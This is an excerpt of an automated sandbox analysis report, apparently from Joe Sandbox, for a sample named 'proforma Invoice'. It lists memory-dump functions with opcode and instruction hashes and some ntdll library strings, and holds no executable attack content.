                                                                          • Opcode Fuzzy Hash: 1cb7119231e15ba47938f96b5fc493abbd240a68a9def0e367ccfc9d1218f388
                                                                          • Instruction Fuzzy Hash: 9390043531140003010DF57C0F44547004FD7D5751355C031F1017550CD731CD715731
                                                                          Function 011A2AF0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d8ddaed3d2ea1035834a567a59f793f7a7ec0b7dc91fdca33f4ac97ada8b70ce
                                                                          • Instruction ID: 6a6b2567a9f6057329075a242627e99716845789c89734c5950eadbd87af9756
                                                                          • Opcode Fuzzy Hash: d8ddaed3d2ea1035834a567a59f793f7a7ec0b7dc91fdca33f4ac97ada8b70ce
                                                                          • Instruction Fuzzy Hash: F1900225221400020149B5680B4454B0449A7D6751395C015F1417590CC72189655721
                                                                          Function 011A2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b743c2392ab886a50f32641b4a35e93aaba396d0fddc19006b1d346aec40f942
                                                                          • Instruction ID: 298b3ec7a5b3f6bac600ff0dc2cc2d986921d30f1b560d1215716025035f38a9
                                                                          • Opcode Fuzzy Hash: b743c2392ab886a50f32641b4a35e93aaba396d0fddc19006b1d346aec40f942
                                                                          • Instruction Fuzzy Hash: AF90022921340002D1847168594864A000997D1602F95D415E0017558CCA1589695721
                                                                          Function 011A2D00 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0e4613165bb851676eba4cb8fd3490fad53f09b08e3d003b85209a31d1c6a46a
                                                                          • Instruction ID: 9acf6e9eb7ca5fa3c2540eb62a5f16adfcd8f198b2e324f0af3c0d3e2d918dc3
                                                                          • Opcode Fuzzy Hash: 0e4613165bb851676eba4cb8fd3490fad53f09b08e3d003b85209a31d1c6a46a
                                                                          • Instruction Fuzzy Hash: 0C90022120544442D10475685948A46000997D0605F55D011E1066595DC7358951A631
                                                                          Function 011A2D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4dc6d85a8e9701ef26f54a2797b881323ac318adc6a5d8148ee7d57ecdc66e1b
                                                                          • Instruction ID: b939a01ccd872413a08bae12cfde35214fa2d18dc431f9d7951940c0a457241f
                                                                          • Opcode Fuzzy Hash: 4dc6d85a8e9701ef26f54a2797b881323ac318adc6a5d8148ee7d57ecdc66e1b
                                                                          • Instruction Fuzzy Hash: 0390022130140003D144716859586464009E7E1701F55D011E0416554CDA1589565722
                                                                          Function 011A2DB0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 90cda5a0bfd795fd85387539ef41720cedb6bb4bc6f448e9563b173bd3293550
                                                                          • Instruction ID: 3c4f978b281baa844ccc47fbe15670295e4abad7ca751038f46eea795b50162c
                                                                          • Opcode Fuzzy Hash: 90cda5a0bfd795fd85387539ef41720cedb6bb4bc6f448e9563b173bd3293550
                                                                          • Instruction Fuzzy Hash: F990023124140402D14571684944646000DA7D0641F95C012E0426554EC7558B56AF61
                                                                          Function 011A2DD0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 459fadaefc92539da47d61af8f0525f677e066a6fa495503f9e145ade25b3833
                                                                          • Instruction ID: 3c82943dfcbabf8af35b5d6df0bac565bae79b48c6457d997b01f69b80686d3e
                                                                          • Opcode Fuzzy Hash: 459fadaefc92539da47d61af8f0525f677e066a6fa495503f9e145ade25b3833
                                                                          • Instruction Fuzzy Hash: 35900221242441525549B1684944547400AA7E0641795C012E1416950CC6269956DB21
                                                                          Function 011A2C60 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6d8133f0f4643fbe3908e85da0dc780f689cbf26ffd9afe9e1fd0b16d909227a
                                                                          • Instruction ID: d30b4033046f6bc1dced318c8a041f1d895b34d73183aa4eaf87adfbaaad9fc9
                                                                          • Opcode Fuzzy Hash: 6d8133f0f4643fbe3908e85da0dc780f689cbf26ffd9afe9e1fd0b16d909227a
                                                                          • Instruction Fuzzy Hash: 3B90023120140842D10471684944B86000997E0701F55C016E0126654DC715C9517A21
                                                                          Function 011A2CA0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7eb1ea41c577dc29b9aeaba710e5ffffb0465005ba50423b7aa7807bdc6fc26e
                                                                          • Instruction ID: a083940e474714aa0e80e1dfe346526661bd9598831a3072cd03ab8e9c536fd2
                                                                          • Opcode Fuzzy Hash: 7eb1ea41c577dc29b9aeaba710e5ffffb0465005ba50423b7aa7807bdc6fc26e
                                                                          • Instruction Fuzzy Hash: 4F90023120140402D10475A85948686000997E0701F55D011E5026555EC76589916631
                                                                          Function 011A2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7028e6c973d479cd95170b491d99401bce2e0aeabd7f64efcc6dd588e7e4d885
                                                                          • Instruction ID: 41e186035af947089e6a422f7ac0bcca812030eb9233704ef14c57c8389d3646
                                                                          • Opcode Fuzzy Hash: 7028e6c973d479cd95170b491d99401bce2e0aeabd7f64efcc6dd588e7e4d885
                                                                          • Instruction Fuzzy Hash: 7390022160540402D14471685958746001997D0601F55D011E0026554DC7598B556BA1
                                                                          Function 011A2CF0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9873613f8d30620cc286f1e746f39c325e880d657c10206a8d40521647712440
                                                                          • Instruction ID: 1a214256c7f19fb024f385197547cb5622cdb72aab74f0250dee6015d3c645d0
                                                                          • Opcode Fuzzy Hash: 9873613f8d30620cc286f1e746f39c325e880d657c10206a8d40521647712440
                                                                          • Instruction Fuzzy Hash: AF90023120140403D10471685A48747000997D0601F55D411E0426558DD75689516621
                                                                          Function 011A2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e3ece1078b60b29614ca8b7fa889de1bd3ebc31a4dade1bfdda20504e0e8e1ab
                                                                          • Instruction ID: b378c1ab470c9923bad2bf3757c80e5a167855c39314b7922699450959138fa9
                                                                          • Opcode Fuzzy Hash: e3ece1078b60b29614ca8b7fa889de1bd3ebc31a4dade1bfdda20504e0e8e1ab
                                                                          • Instruction Fuzzy Hash: BA90026134140442D10471684954B460009D7E1701F55C015E1066554DC719CD526626
                                                                          Function 011A2F60 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1869d2c38e21bc02c443c5c0c943c148a484dd2192e014766525f30580bd8ab7
                                                                          • Instruction ID: e4529df3485727f38e91ac07277e9e02115ba9f2b931234cff0f82a00f2854d5
                                                                          • Opcode Fuzzy Hash: 1869d2c38e21bc02c443c5c0c943c148a484dd2192e014766525f30580bd8ab7
                                                                          • Instruction Fuzzy Hash: 5990026121140042D10871684944746004997E1601F55C012E2156554CC6298D615625
                                                                          Function 011A2F90 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8d9d427bac6a74b5e94841412a8bb5d03e180ed65cb93328f426f53f1d773c59
                                                                          • Instruction ID: 7f85a29893f0ac51b56924f0f24fe973b55f36d7c24614994927ed302273a637
                                                                          • Opcode Fuzzy Hash: 8d9d427bac6a74b5e94841412a8bb5d03e180ed65cb93328f426f53f1d773c59
                                                                          • Instruction Fuzzy Hash: C690023120180402D10471684D5474B000997D0702F55C011E1166555DC72589516A71
                                                                          Function 011A2FB0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b018c688c2be956291641b1f921a37782ab51de609dbcb3361beccaa21ec316f
                                                                          • Instruction ID: f0f2903308faf6f641683178ce9d4bd9e5a53447652ca2d651c8293fcc24bedb
                                                                          • Opcode Fuzzy Hash: b018c688c2be956291641b1f921a37782ab51de609dbcb3361beccaa21ec316f
                                                                          • Instruction Fuzzy Hash: EA90022160140042414471788D849464009BBE1611755C121E099A550DC65989655B65
                                                                          Function 011A2FA0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fcb2c0a3bfb06c46049b57447cacf6c874257b03bc30199b2a77117de46bee0b
                                                                          • Instruction ID: b46296af3f0138bd8947d1991da2bda839c9738b24cf1d09d50129969d2db943
                                                                          • Opcode Fuzzy Hash: fcb2c0a3bfb06c46049b57447cacf6c874257b03bc30199b2a77117de46bee0b
                                                                          • Instruction Fuzzy Hash: EC90023120180402D10471684D48787000997D0702F55C011E5166555EC765C9916A31
                                                                          Function 011A2FE0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6d89c709075886642eb608830dd7715d615cb993b1438785c00e949b0e34e71a
                                                                          • Instruction ID: f6f91ad7dfc004d2e4f1722d8039a333833d304c24dff8df8c90a8885d8842f6
                                                                          • Opcode Fuzzy Hash: 6d89c709075886642eb608830dd7715d615cb993b1438785c00e949b0e34e71a
                                                                          • Instruction Fuzzy Hash: 10900221211C0042D20475784D54B47000997D0703F55C115E0156554CCA1589615A21
                                                                          Function 011A2E30 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fb70eac06d313cc918cbc44e56e90babf31820149a5101af8c57ab35077aab6a
                                                                          • Instruction ID: b0c11c82eb0a99f99a2d68357325ffc665f63212133c434c87c01b46f567e883
                                                                          • Opcode Fuzzy Hash: fb70eac06d313cc918cbc44e56e90babf31820149a5101af8c57ab35077aab6a
                                                                          • Instruction Fuzzy Hash: 5090022130140402D10671684954646000DD7D1745F95C012E1426555DC7258A53A632
                                                                          Function 011A2E80 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7a31fac3ee87a92f5ef5eca6c750de4a0a8625d81219efda8f28ec4f4e4e1ebf
                                                                          • Instruction ID: aa7f28697c0580ea99967134870ba793cbe3a123122425d97a0614a829304d10
                                                                          • Opcode Fuzzy Hash: 7a31fac3ee87a92f5ef5eca6c750de4a0a8625d81219efda8f28ec4f4e4e1ebf
                                                                          • Instruction Fuzzy Hash: 0890022160140502D10571684944656000E97D0641F95C022E1026555ECB258A92A631
                                                                          Function 011A2EA0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7881cece82743a824ba2250c4a84d0034d54b63540e9a7bd4dcf6280eb90f00b
                                                                          • Instruction ID: eb5af77ba999a953f0a5bd3a7ef8b48a26d59415fb01c10b6451eb3dea168a4c
                                                                          • Opcode Fuzzy Hash: 7881cece82743a824ba2250c4a84d0034d54b63540e9a7bd4dcf6280eb90f00b
                                                                          • Instruction Fuzzy Hash: CC90027120140402D14471684944786000997D0701F55C011E5066554EC7598ED56B65
                                                                          Function 011A2EE0 Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9720b80feb7efc628b89569873ad3283da0d65cd3a27b3a4fedd0c410b42c9e7
                                                                          • Instruction ID: 57bbec1513305240081dcc53768f1ca7b9d8f73ce15809916e5fe73e7b98a976
                                                                          • Opcode Fuzzy Hash: 9720b80feb7efc628b89569873ad3283da0d65cd3a27b3a4fedd0c410b42c9e7
                                                                          • Instruction Fuzzy Hash: B790026120180403D14475684D44647000997D0702F55C011E2066555ECB298D516635
                                                                          Function 011A2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction ID: 51e25ed7aa5d1cfbf6554dadc7db39262cc789d941dd6e61b7526bb0f62e3f5e
                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                          • Instruction Fuzzy Hash:
                                                                          Function 011A2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: f82a1f01238dedae285d694f93e25a3f733fea178b4017578d0994def3e56925
                                                                          • Instruction ID: e0fbd9f4fb3d71dab0bcd3e3576fad864d8e52036e6eb8303f28da5b9d8d6c4a
                                                                          • Opcode Fuzzy Hash: f82a1f01238dedae285d694f93e25a3f733fea178b4017578d0994def3e56925
                                                                          • Instruction Fuzzy Hash: FF51E6B6A00126BFCB19DB9C89D097EFFF8BF48640B948269F465D7641E334DE4087A1
                                                                          Function 01212410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                          • API String ID: 48624451-2108815105
                                                                          • Opcode ID: e46b1fa574c50a380fc31fdba6b4be6a4c5162c35547eee802833d9c98244af8
                                                                          • Instruction ID: e308032117b20edeab67b0f11dc0ffa43e581a96e0128c90478fc4de1a076017
                                                                          • Opcode Fuzzy Hash: e46b1fa574c50a380fc31fdba6b4be6a4c5162c35547eee802833d9c98244af8
                                                                          • Instruction Fuzzy Hash: B7512871A10646EECB38DF5DC8D097FBBF8EB58200B248469F5A6D7646E7B4DA008760
                                                                          Function 01197630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 011D4725
                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 011D4787
                                                                          • Execute=1, xrefs: 011D4713
                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 011D4655
                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 011D4742
                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011D46FC
                                                                          • ExecuteOptions, xrefs: 011D46A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                          • API String ID: 0-484625025
                                                                          • Opcode ID: 83f15e5b674a53384fb013347adf4a87c278c3e755925c11b9b6194c45a55dad
                                                                          • Instruction ID: 3844e17703c6c523a7fa9ac76ae2d4c93a9f4eba03507887fee3d115096112ec
                                                                          • Opcode Fuzzy Hash: 83f15e5b674a53384fb013347adf4a87c278c3e755925c11b9b6194c45a55dad
                                                                          • Instruction Fuzzy Hash: CC513A35A0021A7BEF1DAFA8EC89FED77A8AF54704F080099D615AB1C1E7709A41CF91
                                                                          Function 011AB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldvrm
                                                                          • String ID: +$-$0$0
                                                                          • API String ID: 1302938615-699404926
                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction ID: 1e1203e87c52b26611fae95010750ebaa1ae0eaa35f7e7d5ecbee5016ba7f489
                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                          • Instruction Fuzzy Hash: 4881B278E092C99EEF2D8EACC4517FEBFB1AF45320F984119D855A72D1C7748840CB59
                                                                          Function 0118F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011D02BD
                                                                          • RTL: Re-Waiting, xrefs: 011D031E
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011D02E7
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                          • API String ID: 0-2474120054
                                                                          • Opcode ID: 0f51f162dbbf05610625d66cb1bade9c270d54f3bae58ed74318aef427f81582
                                                                          • Instruction ID: 7a19f37b5df8fb124def382f5bec8845f515cad68c7a301b3401c55c35027ca8
                                                                          • Opcode Fuzzy Hash: 0f51f162dbbf05610625d66cb1bade9c270d54f3bae58ed74318aef427f81582
                                                                          • Instruction Fuzzy Hash: 04E19F306087429FE72DDF28C884B2ABBE0BB89718F144A1DF5A5CB2D1D774D946CB52
                                                                          Function 0119B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011D728C
                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 011D72C1
                                                                          • RTL: Resource at %p, xrefs: 011D72A3
                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 011D7294
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                          • API String ID: 885266447-605551621
                                                                          • Opcode ID: a21ddb78a65ab752dcc427fe7abaad9f826befbf107d5b13db0360a706cccd88
                                                                          • Instruction ID: 3476cf1041d5bd995396e09e385e9c10313330672d8131c54ba6b65a69a4e0d0
                                                                          • Opcode Fuzzy Hash: a21ddb78a65ab752dcc427fe7abaad9f826befbf107d5b13db0360a706cccd88
                                                                          • Instruction Fuzzy Hash: 7841F231704643ABDB29DE69CC41F6AB7A5FF94B18F140619F956AB280DB30F80287D5
                                                                          Function 01212300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: %%%u$]:%u
                                                                          • API String ID: 48624451-3050659472
                                                                          • Opcode ID: 42ff8a4d62d179fd0f67aa2a44dc6ede8ca5febecdd16700343aa71696f00196
                                                                          • Instruction ID: 0b02f9cb2b3a3fc8838d397621a723221213bbf6111a1a5470ffea35aa3aa7bf
                                                                          • Opcode Fuzzy Hash: 42ff8a4d62d179fd0f67aa2a44dc6ede8ca5febecdd16700343aa71696f00196
                                                                          • Instruction Fuzzy Hash: 43318672A10219DFDB24DF2DCC40BEEB7F8EB54650F540555F949E3244EB30EA448BA0
                                                                          Function 01169126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$@
                                                                          • API String ID: 0-1194432280
                                                                          • Opcode ID: 1d1a6b2c2c8aa8bd036b481d69cbfc1142576095ebe953f9e1d53f00c8ffa5ab
